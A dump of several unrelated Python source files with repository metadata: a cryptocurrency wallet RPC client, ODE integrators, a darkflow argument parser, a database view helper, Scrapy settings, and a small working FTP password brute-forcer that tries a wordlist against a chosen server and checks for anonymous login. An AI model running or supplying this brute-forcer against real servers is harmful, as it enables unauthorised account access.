        print access.getaddressesbyaccount(acct)
    except:
        print "\n---An error occurred---\n"
elif cmd == "getbalance":
    try:
        acct = raw_input("Enter an account (optional): ")
        mc = raw_input("Minimum confirmations (optional): ")
        # Inner try: retry without arguments when the optional ones are rejected.
        try:
            print access.getbalance(acct, mc)
        except:
            print access.getbalance()
    except:
        print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
    try:
        height = raw_input("Height: ")
        print access.getblockbycount(height)
    except:
        print "\n---An error occurred---\n"
elif cmd == "getblockcount":
    try:
        print access.getblockcount()
    except:
        print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
    try:
        print access.getblocknumber()
    except:
        print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
    try:
        print access.getconnectioncount()
    except:
        print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
    try:
        print access.getdifficulty()
    except:
        print "\n---An error occurred---\n"
elif cmd == "getgenerate":
    try:
        print access.getgenerate()
    except:
        print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
    try:
        print access.gethashespersec()
    except:
        print "\n---An error occurred---\n"
elif cmd == "getinfo":
    try:
        print access.getinfo()
    except:
        print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
    try:
        acct = raw_input("Enter an account name: ")
        try:
            print access.getnewaddress(acct)
        except:
            print access.getnewaddress()
    except:
        print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
    try:
        acct = raw_input("Enter an account (optional): ")
        mc = raw_input("Minimum confirmations (optional): ")
        try:
            print access.getreceivedbyaccount(acct, mc)
        except:
            print access.getreceivedbyaccount()
    except:
        print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
    try:
        addr = raw_input("Enter a Chilcoin address (optional): ")
        mc = raw_input("Minimum confirmations (optional): ")
        try:
            print access.getreceivedbyaddress(addr, mc)
        except:
            print access.getreceivedbyaddress()
    except:
        print "\n---An error occurred---\n"
elif cmd == "gettransaction":
    try:
        txid = raw_input("Enter a transaction ID: ")
        print access.gettransaction(txid)
    except:
        print "\n---An error occurred---\n"
elif cmd == "getwork":
    try:
        data = raw_input("Data (optional): ")
        # NOTE(review): this branch calls gettransaction(), not getwork() —
        # looks like a copy/paste bug inherited from upstream; confirm.
        try:
            print access.gettransaction(data)
        except:
            print access.gettransaction()
    except:
        print "\n---An error occurred---\n"
elif cmd == "help":
    try:
        cmd = raw_input("Command (optional): ")
        try:
            print access.help(cmd)
        except:
            print access.help()
    except:
        print "\n---An error occurred---\n"
elif cmd == "listaccounts":
    try:
        mc = raw_input("Minimum confirmations (optional): ")
        try:
            print access.listaccounts(mc)
        except:
            print access.listaccounts()
    except:
        print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
    try:
        mc = raw_input("Minimum confirmations (optional): ")
        incemp = raw_input("Include empty? (true/false, optional): ")
        try:
            print access.listreceivedbyaccount(mc, incemp)
        except:
            print access.listreceivedbyaccount()
    except:
        print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
    try:
        mc = raw_input("Minimum confirmations (optional): ")
        incemp = raw_input("Include empty? (true/false, optional): ")
        try:
            print access.listreceivedbyaddress(mc, incemp)
        except:
            print access.listreceivedbyaddress()
    except:
        print "\n---An error occurred---\n"
elif cmd == "listtransactions":
    try:
        acct = raw_input("Account (optional): ")
        count = raw_input("Number of transactions (optional): ")
        frm = raw_input("Skip (optional):")
        try:
            print access.listtransactions(acct, count, frm)
        except:
            print access.listtransactions()
    except:
        print "\n---An error occurred---\n"
elif cmd == "move":
    try:
        frm = raw_input("From: ")
        to = raw_input("To: ")
        amt = raw_input("Amount:")
        mc = raw_input("Minimum confirmations (optional): ")
        comment = raw_input("Comment (optional): ")
        try:
            print access.move(frm, to, amt, mc, comment)
        except:
            print access.move(frm, to, amt)
    except:
        print "\n---An error occurred---\n"
elif cmd == "sendfrom":
    try:
        frm = raw_input("From: ")
        to = raw_input("To: ")
        amt = raw_input("Amount:")
        mc = raw_input("Minimum confirmations (optional): ")
        comment = raw_input("Comment (optional): ")
        commentto = raw_input("Comment-to (optional): ")
        try:
            print access.sendfrom(frm, to, amt, mc, comment, commentto)
        except:
            print access.sendfrom(frm, to, amt)
    except:
        print "\n---An error occurred---\n"
elif cmd == "sendmany":
    try:
        frm = raw_input("From: ")
        to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
        mc = raw_input("Minimum confirmations (optional): ")
        comment = raw_input("Comment (optional): ")
        try:
            print access.sendmany(frm,to,mc,comment)
        except:
            print access.sendmany(frm,to)
    except:
        print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
    try:
        to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
        amt = raw_input("Amount:")
        comment = raw_input("Comment (optional): ")
        commentto = raw_input("Comment-to (optional): ")
        try:
            print access.sendtoaddress(to,amt,comment,commentto)
        except:
            print access.sendtoaddress(to,amt)
    except:
        print "\n---An error occurred---\n"
elif cmd == "setaccount":
    try:
        addr = raw_input("Address: ")
        acct = raw_input("Account:")
        print access.setaccount(addr,acct)
    except:
        print "\n---An error occurred---\n"
elif cmd == "setgenerate":
    try:
        gen= raw_input("Generate? (true/false): ")
        cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
        try:
            print access.setgenerate(gen, cpus)
        except:
            print access.setgenerate(gen)
    except:
        print "\n---An error occurred---\n"
elif cmd == "settxfee":
    try:
        amt = raw_input("Amount:")
        print access.settxfee(amt)
    except:
        print "\n---An error occurred---\n"
elif cmd == "stop":
    try:
        print access.stop()
    except:
        print "\n---An error occurred---\n"
elif cmd == "validateaddress":
    try:
        addr = raw_input("Address: ")
        print access.validateaddress(addr)
    except:
        print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
    try:
        pwd = raw_input("Enter wallet passphrase: ")
        # Unlock the wallet for 60 seconds.
        access.walletpassphrase(pwd, 60)
        print "\n---Wallet unlocked---\n"
    except:
        print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
    try:
        pwd = raw_input("Enter old wallet passphrase: ")
        pwd2 = raw_input("Enter new wallet passphrase: ")
        access.walletpassphrasechange(pwd, pwd2)
        print
        print "\n---Passphrase changed---\n"
    except:
        print
        print "\n---An error occurred---\n"
    print
else:
    print "Command not found or not supported"
| [
"o.guerrero.g@gmail.com"
] | o.guerrero.g@gmail.com |
de45b5fb59e4ed81160ae7c420e580b610fc00bc | 9124d33767414433ca2cad8e33aa47bd03d6f5c7 | /Python/PythonKurs 2015.04/double_pendulum-r25/ode.py | 562e09530b6c41530572b94a3e79b1a59c3da341 | [] | no_license | Sir2B/Uni | b05c9351c384fec8a397be36bce6f4bcff7b4276 | f54eee2d2c3af7a628d8058f913bb5ea51724f4a | refs/heads/master | 2020-05-22T01:13:55.752574 | 2020-03-15T11:48:36 | 2020-03-15T11:48:36 | 24,673,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,432 | py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
#------------------------------------------------------------------------------
# Module for solving ordinary differential equations (ODE).
#
# Author: Tino Wagner
# Creation: 03/2008
# Last Change: $Date: 2008-03-27 11:18:15 +0100 (Do, 27 Mär 2008) $
# by $Author: tino $
#------------------------------------------------------------------------------
import math
# Global configuration
QUIET = True # Should the integrators be quiet? (suppresses the per-step diagnostics below)
MAX_STEPS = 5000 # How many iterations? (cap on adaptive step attempts per integrate() call)
class ODE(object):
    """Common interface shared by the ODE integrators in this module.

    Holds the current state vector ``_x``, the current time ``_t``, the
    error tolerances and the right-hand-side callable ``_rhs`` with
    signature ``rhs(x, t)``.
    """
    def __init__(self, rhs=None, x=None, t=0, atol=None, rtol=None,
                 min_dt=None):
        """Store the system definition and the initial conditions."""
        self._x = x
        self._t = t
        self.atol = atol
        self.rtol = rtol
        self.min_dt = min_dt
        # Fall back to the (overridable) rhs method when no callable is given.
        self._rhs = self.rhs if rhs is None else rhs
    def set_ode(self, rhs):
        """Replace the right-hand-side function of the system."""
        self._rhs = rhs
    def set_initial(self, x, t=0):
        """Reset the state vector and the current time."""
        self._x = x
        self._t = t
    def rhs(self, x, t):
        """Default right hand side: the empty system x' = rhs(x, t) = []."""
        return []
    def integrate(self, dt):
        """Advance the solution by dt; implemented by subclasses."""
        pass
class Euler(ODE):
    """Solves ODE using the straight-forward (explicit) Euler method."""
    def __init__(self, rhs=None, x=None, t=0, atol=None, rtol=None,
                 min_dt=None, steps=20):
        super(Euler, self).__init__(rhs, x, t, atol, rtol, min_dt)
        self.steps = steps # number of integration steps between t and t + dt
    def step(self, dt, x0=None, t0=None):
        """Return the state advanced by one Euler step of size dt.

        x0/t0 default to the stored state; the stored state itself is
        not modified here.
        """
        t = self._t if t0 is None else t0
        x = self._x if x0 is None else x0
        n = len(x)
        k1 = self._rhs(x, t) # the one and only slope evaluation
        x_temp = [x[i] + dt * k1[i] for i in xrange(0, n)]
        return x_temp
    def integrate(self, dt):
        """Advance the stored state from t to t + dt using self.steps substeps."""
        n_steps = self.steps
        # Force float division: under Python 2 an integer dt would be
        # truncated (e.g. 1/20 == 0) and time would never advance.
        dt_i = dt / float(n_steps)
        for i in xrange(0, n_steps):
            self._x = self.step(dt_i)
            self._t += dt_i
        return self._x
class RungeKutta(ODE):
    """Solves ODE using the classical 4th order Runge-Kutta scheme."""
    def __init__(self, rhs=None, x=None, t=0, atol=None,
                 rtol=None, min_dt=None, steps=15):
        super(RungeKutta, self).__init__(rhs, x, t, atol, rtol, min_dt)
        self.steps = steps # number of integration steps between t and t + dt
    def step(self, dt, x0=None, t0=None):
        """Return the state advanced by one RK4 step of size dt (state not stored)."""
        t = self._t if t0 is None else t0
        x = self._x if x0 is None else x0
        n = len(x)
        # Four slope evaluations; the ``2.0``/``6.0`` denominators avoid
        # Python 2 integer truncation when dt or the state is integral
        # (for float input the results are bit-identical to before).
        k1 = self._rhs(x, t) # slope at the interval start
        x_temp = [x[i] + dt * k1[i] / 2.0 for i in xrange(0, n)]
        k2 = self._rhs(x_temp, t + dt / 2.0) # slope at the midpoint
        x_temp = [x[i] + dt * k2[i] / 2.0 for i in xrange(0, n)]
        k3 = self._rhs(x_temp, t + dt / 2.0) # second midpoint slope
        x_temp = [x[i] + dt * k3[i] for i in xrange(0, n)]
        k4 = self._rhs(x_temp, t + dt) # slope at the interval end
        # Weighted 1-2-2-1 average of the four slopes.
        x_temp = [x[i] + dt * (k1[i] + 2 * k2[i] + 2 * k3[i] + k4[i]) / 6.0 \
                  for i in xrange(0, n)]
        return x_temp
    def integrate(self, dt):
        """Advance the stored state from t to t + dt using self.steps substeps."""
        n_steps = self.steps
        # Float division: an integer dt would otherwise truncate under Python 2.
        dt_i = dt / float(n_steps)
        for i in xrange(0, n_steps):
            self._x = self.step(dt_i)
            self._t += dt_i
        return self._x
class DormandPrince(ODE):
    """Solves ODE using 5th order Dormand-Prince Runge-Kutta method.

    step() returns both the 5th-order solution and a normalized error
    estimate (err < 1 means within atol/rtol); integrate() uses that
    estimate for adaptive step-size control.
    """
    def __init__(self, rhs=None, x=None, t=0, atol=None, rtol=None,
                 min_dt=None):
        super(DormandPrince, self).__init__(rhs, x, t, atol, rtol, min_dt)
    def step(self, dt, x0 = None, t0 = None):
        """Do ODE integration step using Dormand-Prince Runge-Kutta method.

        Returns (x_new, err): x_new is the 5th-order solution; err is the
        scaled 4th/5th-order difference, or None when no tolerances are set.
        """
        # Dormand-Prince 5(4) parameters from "Numerical Recipes"
        c2, c3, c4, c5 = (1./5, 3./10, 4./5, 8./9)
        a21 = 1./5
        a31, a32 = (3./40, 9./40)
        a41, a42, a43 = (44./45, -56./15, 32./9)
        a51, a52, a53, a54 = (19372./6561, -25360./2187, 64448./6561, \
                              -212./729)
        a61, a62, a63, a64, a65 = (9017./3168, -355./33, 46732./5247, \
                                   49./176, -5103./18656)
        a71, a72, a73, a74, a75, a76 = (35./384, 0., 500./1113, 125./192, \
                                        -2187./6784, 11./84)
        # coefficients for 5th order system
        b1, b2, b3, b4, b5, b6, b7 = (35./384, 0., 500./1113, 125./192, \
                                      -2187./6784, 11./84, 0.)
        # coefficients for reduced (4th order) system
        b1r, b2r, b3r, b4r, b5r, b6r, b7r = (5179./57600, 0., 7571./16695, \
                                             393./640, -92097./339200, 187./2100, 1./40)
        t = self._t if t0 is None else t0
        x = self._x if x0 is None else x0
        n = len(x)
        k1 = self._rhs(x, t) # step 1
        x_temp = [x[i] + dt * a21 * k1[i] for i in xrange(0, n)]
        k2 = self._rhs(x_temp, t + dt * c2) # step 2
        x_temp = [x[i] + dt * (a31 * k1[i] + a32 * k2[i])
                  for i in xrange(0, n)]
        k3 = self._rhs(x_temp, t + dt * c3) # step 3
        x_temp = [x[i] + dt * (a41 * k1[i] + a42 * k2[i] + a43 * k3[i])
                  for i in xrange(0, n)]
        k4 = self._rhs(x_temp, t + dt * c4) # step 4
        x_temp = [x[i] + dt * \
                  (a51 * k1[i] + a52 * k2[i] + a53 * k3[i] + a54 * k4[i])
                  for i in xrange(0, n)]
        k5 = self._rhs(x_temp, t + dt * c5) # step 5
        x_temp = [x[i] + dt * \
                  (a61 * k1[i] + a62 * k2[i] + a63 * k3[i] + a64 * k4[i] + \
                   a65 * k5[i])
                  for i in xrange(0, n)]
        k6 = self._rhs(x_temp, t + dt) # step 6
        # 5th order solution
        x_t = [x[i] + dt * \
               (b1 * k1[i] + b2 * k2[i] + b3 * k3[i] + b4 * k4[i] + \
                b5 * k5[i] + b6 * k6[i])
               for i in xrange(0, n)]
        # w/o error if not tolerances given
        if self.atol is None and self.rtol is None:
            return (x_t, None)
        x_temp = [x[i] + dt * \
                  (a71 * k1[i] + a72 * k2[i] + a73 * k3[i] + a74 * k4[i] + \
                   a75 * k5[i] + a76 * k6[i])
                  for i in xrange(0, n)]
        # step 7 - can be optimized! first same as last (p. 913)
        # (FSAL: k7 equals the k1 of the next accepted step)
        k7 = self._rhs(x_temp, t + dt)
        # 4th order solution
        x_tr = [x[i] + dt * (b1r * k1[i] + b2r * k2[i] + b3r * k3[i] + \
                b4r * k4[i] + b5r * k5[i] + b6r * k6[i] + \
                b7r * k7[i])
                for i in xrange(0, n)]
        def norm(vec): # calculate error
            return math.sqrt(sum([x**2 for x in vec]))
        xx = x_t if norm(x_t) > norm(x) else x
        # scale = atol + max(x_t, x) * rtol
        scale = [self.atol + abs(self.rtol * x_i) for x_i in xx]
        # delta = abs(x_t - x_tr) <= scale
        delta = [abs(x_t[i] - x_tr[i]) for i in xrange(0, n)]
        # err (RMS of the component-wise scaled error; err < 1 is acceptable)
        err = math.sqrt(sum([(delta[i] / scale[i]) ** 2
                             for i in xrange(0, n)]) / n)
        return (x_t, err)
    def integrate(self, dt):
        """Controls ODE integration (adaptive step size when tolerances are set)."""
        # if no tolerances are given, only do the step dt
        if self.atol is None and self.rtol is None:
            (x, err) = self.step(dt)
            self._x = x
            self._t += dt
            return self._x
        h = dt # help step
        target_t = self._t + dt # target time
        step_cnt = 0
        while step_cnt < MAX_STEPS:
            step_cnt += 1
            if (self._t + h) > target_t:
                break # break if under target time
            (x, err) = self.step(h)
            if not QUIET:
                print "New x calculated using h = %f." % h
            if err < 1:
                # Step accepted: commit state and advance time.
                self._x = x
                self._t += h
                if not QUIET:
                    print "Integration error = %.2f < 1" % err
            else:
                # Step rejected: shrink h (err**-0.2 is the classic 5th-order rule).
                # safety for calculation of new step width
                safe = 0.9
                h *= safe * math.pow(err, -0.2)
                if not QUIET:
                    print "x dropped. New h: %f" % h
        # remaining step
        hh = target_t - self._t
        # if remaining step > last h => use new h = min_step
        if hh > h:
            print "MAX_STEPS = %i used." % MAX_STEPS
            if self.min_dt is not None:
                print "Doing remaining steps using min_dt = %.2f" \
                    % self.min_dt
                while (self._t+self.min_dt < target_t):
                    (x, err) = self.step(self.min_dt)
                    self._x = x
                    self._t += self.min_dt
                # remaining step
                hh = target_t - self._t
        if not QUIET:
            print "Last h: %f" % hh
        # Final (possibly tiny) step lands exactly on target_t.
        (x, err) = self.step(hh)
        self._x = x
        self._t += hh
        return self._x
# ODE solver using scipy's odeint
try:
from scipy.integrate import odeint
class ODEint(ODE):
def __init__(self, rhs=None, x=None, t=0, atol=None, rtol=None,
min_dt=None):
super(ODEint, self).__init__(rhs, x, t, atol, rtol, min_dt=None)
def integrate(self, dt):
"""Integrate ODE using Scipy solvers."""
self._x = odeint(self._rhs, self._x, [0, dt],
atol=self.atol, rtol=self.rtol)[-1]
self._t += dt
return self._x
except ImportError:
print "ODE: Scipy integrator not available."
# Set a default integrator.
DefaultIntegrator = DormandPrince
if __name__ == '__main__':
    # Self-test: integrate the harmonic oscillator from x(0) = 1, x'(0) = 0
    # to t = pi with every available solver; the exact answer is cos(pi) = -1.
    # solve sample ODE: x'' + x = 0
    # => x' = u
    # => u' = -x
    def diff(x, t):
        return [x[1], -x[0]]
    atol = rtol = 1e-10
    odes = [Euler(diff, [1.0, 0]), RungeKutta(diff, [1.0, 0]),
            DormandPrince(diff, [1.0, 0], atol=atol, rtol=rtol)]
    try:
        odes += [ODEint(diff, [1.0, 0], atol = atol, rtol = rtol)]
    except:
        # ODEint is undefined (NameError) when scipy could not be imported.
        print "Skipping ODEint test."
    for ode in odes:
        print repr(ode)
        print "cos(pi): %.10f" % ode.integrate(math.pi)[0]
| [
"tobias.obermayer@physik.uni-muenchen.de"
] | tobias.obermayer@physik.uni-muenchen.de |
class argHandler(dict):
    """Dict-backed command line argument handler for darkflow.

    Flags are registered via define() (setDefaults() registers the full
    set) and are then readable both as dict items and as attributes.
    parseArgs() overrides the defaults from a sys.argv-style list,
    coercing each value to the type of its registered default.
    """
    #A super duper fancy custom made CLI argument handler!!
    # Route attribute access through the dict so args.model == args['model'].
    __getattr__ = dict.get
    __setattr__ = dict.__setitem__
    __delattr__ = dict.__delitem__
    # NOTE(review): class-level mutable dict -- all instances share the same
    # description table. Fine while a single handler exists; confirm before
    # ever creating two instances.
    _descriptions = {'help, --h, -h': 'show this super helpful message and exit'}

    def setDefaults(self):
        """Register every supported flag with its default value and help text."""
        self.define('imgdir', './sample_img/', 'path to testing directory with images')
        self.define('binary', './bin/', 'path to .weights directory')
        self.define('config', './cfg/', 'path to .cfg directory')
        self.define('dataset', '../pascal/VOCdevkit/IMG/', 'path to dataset directory')
        self.define('labels', 'labels.txt', 'path to labels file')
        self.define('backup', './ckpt/', 'path to backup folder')
        self.define('summary', '', 'path to TensorBoard summaries directory')
        self.define('annotation', '../pascal/VOCdevkit/ANN/', 'path to annotation directory')
        self.define('threshold', -0.1, 'detection threshold')
        self.define('model', '', 'configuration of choice')
        self.define('trainer', 'rmsprop', 'training algorithm')
        self.define('momentum', 0.0, 'applicable for rmsprop and momentum optimizers')
        self.define('verbalise', True, 'say out loud while building graph')
        self.define('train', False, 'train the whole net')
        self.define('load', '', 'how to initialize the net? Either from .weights or a checkpoint, or even from scratch')
        self.define('savepb', False, 'save net and weight to a .pb file')
        self.define('gpu', 0.0, 'how much gpu (from 0.0 to 1.0)')
        self.define('gpuName', '/gpu:0', 'GPU device name')
        self.define('lr', 1e-5, 'learning rate')
        self.define('keep',20,'Number of most recent training results to save')
        self.define('batch', 4, 'batch size')
        self.define('epoch', 1500, 'number of epoch')
        self.define('save', 2000, 'save checkpoint every ? training examples')
        self.define('demo', '', 'demo on webcam')
        self.define('queue', 1, 'process demo in batch')
        self.define('json', False, 'Outputs bounding box information in json format.')
        self.define('saveVideo', False, 'Records video from input video or camera')
        self.define('pbLoad', '', 'path to .pb protobuf file (metaLoad must also be specified)')
        self.define('metaLoad', '', 'path to .meta file generated during --savepb that corresponds to .pb file')

    def define(self, argName, default, description):
        """Register one flag: store its default value and its help text."""
        self[argName] = default
        self._descriptions[argName] = description

    def help(self):
        """Print usage plus an aligned table of all flags, then exit the process."""
        print('Example usage: flow --imgdir sample_img/ --model cfg/yolo.cfg --load bin/yolo.weights')
        print('')
        print('Arguments:')
        # Pad every flag name to the longest registered one so the
        # description column lines up.
        spacing = max([len(i) for i in self._descriptions.keys()]) + 2
        for item in self._descriptions:
            currentSpacing = spacing - len(item)
            print(' --' + item + (' ' * currentSpacing) + self._descriptions[item])
        print('')
        exit()

    def parseArgs(self, args):
        """Parse a sys.argv-style list into self (args[0] is skipped).

        Values are coerced to the type of the registered default; any
        malformed or unknown flag prints an error and exits the process.
        Note: numeric values are coerced in-place inside ``args``.
        """
        print('')
        i = 1
        while i < len(args):
            # Help flags short-circuit everything else (help() exits).
            if args[i] == '-h' or args[i] == '--h' or args[i] == '--help':
                self.help() #Time for some self help! :)
            if len(args[i]) < 2:
                print('ERROR - Invalid argument: ' + args[i])
                print('Try running flow --help')
                exit()
            # Strip the leading "--" to get the flag name.
            argumentName = args[i][2:]
            # Boolean flags: an explicit true/false value is optional;
            # a bare flag means True.
            if isinstance(self.get(argumentName), bool):
                if not (i + 1) >= len(args) and (args[i + 1].lower() != 'false' and args[i + 1].lower() != 'true') and not args[i + 1].startswith('--'):
                    print('ERROR - Expected boolean value (or no value) following argument: ' + args[i])
                    print('Try running flow --help')
                    exit()
                elif not (i + 1) >= len(args) and (args[i + 1].lower() == 'false' or args[i + 1].lower() == 'true'):
                    self[argumentName] = (args[i + 1].lower() == 'true')
                    i += 1
                else:
                    self[argumentName] = True
            # Non-boolean flags need a value and must have been define()d.
            elif args[i].startswith('--') and not (i + 1) >= len(args) and not args[i + 1].startswith('--') and argumentName in self:
                # Coerce the raw string to the type of the registered default.
                if isinstance(self[argumentName], float):
                    try:
                        args[i + 1] = float(args[i + 1])
                    except:
                        print('ERROR - Expected float for argument: ' + args[i])
                        print('Try running flow --help')
                        exit()
                elif isinstance(self[argumentName], int):
                    try:
                        args[i + 1] = int(args[i + 1])
                    except:
                        print('ERROR - Expected int for argument: ' + args[i])
                        print('Try running flow --help')
                        exit()
                self[argumentName] = args[i + 1]
                i += 1
            else:
                print('ERROR - Invalid argument: ' + args[i])
                print('Try running flow --help')
                exit()
            i += 1
| [
"iamyugachang@gmail.com"
] | iamyugachang@gmail.com |
cf2edc8f1e4119ea0fc089508c5b8179a8bfb65e | 893bb8d726e48ac471ce963feab8844561d7fb31 | /src/views.py | d88955358e7d7d83c61b5df8d147e9d773b38171 | [] | no_license | tadtenacious/nrd_db_proj | 92262bff89e1460233d41fb1278e2365fa265c41 | ce9281242beabaf955f2e85fb1692c334199ed9f | refs/heads/master | 2020-06-08T15:42:13.966248 | 2020-01-17T01:28:07 | 2020-01-17T01:28:07 | 193,255,193 | 0 | 1 | null | 2020-01-12T21:40:08 | 2019-06-22T16:25:23 | Python | UTF-8 | Python | false | false | 429 | py | import psycopg2
from .db import reader
def make_views(con, cursor):
    """Create the database views defined in sql/create_views.sql.

    Commits on success; on a psycopg2 operational/programming error the
    transaction is rolled back and the error is printed.
    """
    sql = reader('sql/create_views.sql')
    print('Creating views. This will take a while.')
    try:
        cursor.execute(sql)
        con.commit()
        print('Views created successfully.')
    except (psycopg2.OperationalError, psycopg2.ProgrammingError) as err:
        print('An error occured.')
        print(err)
        con.rollback()
| [
"tadworkswith@gmail.com"
] | tadworkswith@gmail.com |
f51a2ebb6f85f0f5d06ee9ac9dd3373d5880f1d0 | d17724b2ce056b435f57b16fb0cbea32e44a29c6 | /Gun4PY/ftp-bruteforce.py | 0f673dce18e4b54b0c7f64d8571451b8a5f6f497 | [] | no_license | UgurCIL/Examples | 27264d89131b4aaff46f91705a03779c4e825ad6 | c1722a519836a24c8a946380e6cbcd6da963f0c5 | refs/heads/master | 2020-04-24T15:28:17.288204 | 2019-02-22T13:30:35 | 2019-02-22T13:30:35 | 172,069,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,018 | py | import sys
from ftplib import FTP
def checkAnonymous(dstIP):
    """Report whether the FTP server at dstIP accepts anonymous logins.

    Prints the anonymous credentials when the login succeeds; stays silent
    otherwise (connection failures and rejected logins are both treated as
    "no anonymous access").
    """
    try:
        ftp = FTP(dstIP)
        ftp.login()  # no arguments -> anonymous login
        print("[*] Anonymous giris acik")
        print("[*] Kullanici Adi : anonymous")
        print("[*] Parola : anonymous")
        ftp.close()
    except Exception:
        # BUG FIX: was a bare ``except:``, which also swallowed SystemExit
        # and KeyboardInterrupt. ``Exception`` keeps the silent-failure
        # behaviour without blocking Ctrl-C or process exit.
        pass
def ftpLogin(dstIP, user, passw):
    """Try one user/password pair against the FTP server at dstIP.

    On success prints the credentials and terminates the script via
    sys.exit(0); on failure returns silently so the caller can try the
    next password.
    """
    try:
        ftp = FTP(dstIP)
        ftp.login(user, passw)
        ftp.quit()
    except Exception:
        # Login rejected or connection failed: not the right password.
        return
    print("[!] Kullanici/Parola bulundu.")
    print("[!] Kullanici Adi : " + user)
    print("[!] Parola : " + passw)
    # BUG FIX: sys.exit() previously sat inside the try block, whose bare
    # ``except: pass`` caught the SystemExit it raises -- so the script
    # never actually stopped after finding a valid password.
    sys.exit(0)
def bruteForce(dstIP, user, wordL):
    """Dictionary attack: try every password in file wordL for ``user``.

    ftpLogin() terminates the process on a successful login, so falling
    out of the loop means no password in the list matched.
    """
    try:
        wordlist = open(wordL, "r")
    except IOError:
        # BUG FIX: the old bare ``except:`` around everything reported a
        # missing/unreadable wordlist as "password not found" and also
        # swallowed the SystemExit raised on success.
        print("[-] Parola listesi acilamadi : " + wordL)
        sys.exit(1)
    try:
        for word in wordlist:
            ftpLogin(dstIP, user, word.strip())
    finally:
        wordlist.close()  # the file handle used to leak
    # Reached only when every password was tried without success; the old
    # code never printed this message on a normally completed loop.
    print("[-] Eslesen parola bulunamadi..")
    sys.exit(0)
# --- interactive entry point (Python 2: uses raw_input) ---
dstIP = raw_input("FTP sunucu adresi : ")
user = raw_input("Kullanici adi : ")
wordlist = raw_input("Parola listesi : ")
bruteForce(dstIP, user, wordlist)
# NOTE(review): bruteForce may terminate the process via sys.exit(), in
# which case this anonymous-login check never runs -- consider checking
# anonymous access first.
checkAnonymous(dstIP)
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
c1832532d3861a28db187f5e643e52e7b47cdba6 | 395fe73bfc31cace2cfb3e83d28c1b3a3bbed0c1 | /spider_jd/spider_jd/settings.py | 92173872ae373b5e9b32821cb51e90722b842d28 | [] | no_license | Tobyxly/web_crawler | 0f9945c513cd945296974cd907dcfc1b8ab84166 | f5ffab9737cb6c02bf872809ed14665d7621c6bd | refs/heads/master | 2021-05-02T01:53:20.538031 | 2018-02-09T08:02:45 | 2018-02-09T08:02:45 | 120,875,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,122 | py | # -*- coding: utf-8 -*-
# Scrapy settings for spider_jd project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
# Name of this Scrapy project/bot.
BOT_NAME = 'spider_jd'

# Module(s) where Scrapy looks for spider classes; new spiders are
# generated into NEWSPIDER_MODULE.
SPIDER_MODULES = ['spider_jd.spiders']
NEWSPIDER_MODULE = 'spider_jd.spiders'

# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'spider_jd (+http://www.yourdomain.com)'

# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'spider_jd.middlewares.SpiderJdSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'spider_jd.middlewares.SpiderJdDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'spider_jd.pipelines.SpiderJdPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
#LOG_LEVEL = 'DEBUG'
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"lyxiong@mobvoi.com"
